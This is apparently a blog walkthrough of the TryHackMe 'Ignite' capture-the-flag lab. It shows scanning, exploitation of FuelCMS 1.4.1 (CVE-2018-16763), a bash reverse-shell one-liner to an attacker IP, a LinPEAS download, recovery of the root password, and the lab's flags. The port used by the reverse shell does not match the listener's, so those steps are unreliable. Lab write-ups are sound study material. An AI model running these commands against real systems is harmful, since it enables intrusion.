Tryhackme: Ignite

Posted Jun 19, 2025

By Aakash Modi

1 min read

Tryhackme: Ignite

Tryhackme: Ignite — 19 June 2025

🕵️ Web App Testing & Privilege Escalation — Task 1

🔍 Nmap Scan

Command:

  
sudo nmap -T4 -n -sC -sV -Pn -p- -oN networkScan.txt 10.10.242.113

📂 Directory Scan (Gobuster)

Command:

  
gobuster dir -u http://10.10.87.128/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -o directory_scan.txt

🕸️ Web Scraping

Credentials Found:

Username: admin
Password: admin

🗂️ Exploiting FuelCMS v1.4.1

Exploit Repo: CVE-2018-16763-FuelCMS-1.4.1-RCE

Exploit Command:

python3 console.py -t <IP_Address>

🐚 Reverse Shell

Command:

python -c 'import subprocess;subprocess.call(["bash","-c","bash -i >& /dev/tcp/10.8.76.195/4445 0>&1"])'

Listener:

nc -lvnp 4444

🔼 Privilege Escalation

Find SUID Binaries:

  
find / -perm -4000 -type f 2>/dev/null

🛠️ Tools: LinPEAS

Download LinPEAS:

wget http://<Attacker_IP>:<Port>/linpeas.sh

Run LinPEAS:

sh linpeas.sh

Flag Path Found:

🏁 User Flag

Flag: 6470e394cbf6dab6a91682cc8585059b

🔑 Root Password Discovery

Password: mememe
Found in: /var/www/html/fuel/application/config/database.php

Backup Manager Files:

🏆 Accessing Root

Try to switch user:
1 su -
If you get su: must be run from a terminal, spawn a TTY:
1 python -c 'import pty; pty.spawn("/bin/bash")'
- Press CTRL+Z to background the shell.
- Run:
  1 2 stty raw -echo fg
- Press ENTER to return to the shell.

🏁 Root Flag

Flag: b9bbcb33e11b80be759c4e844862482d

🎉 Happy Hacking!

Tryhackme

This post is licensed under CC BY 4.0 by the author.

Tryhackme: Ignite — 19 June 2025

🕵️ Web App Testing & Privilege Escalation — Task 1

🔍 Nmap Scan

📂 Directory Scan (Gobuster)

🕸️ Web Scraping

🗂️ Exploiting FuelCMS v1.4.1

🐚 Reverse Shell

🔼 Privilege Escalation

🛠️ Tools: LinPEAS

🏁 User Flag

🔑 Root Password Discovery

🏆 Accessing Root

🏁 Root Flag

🎉 Happy Hacking!

Trending Tags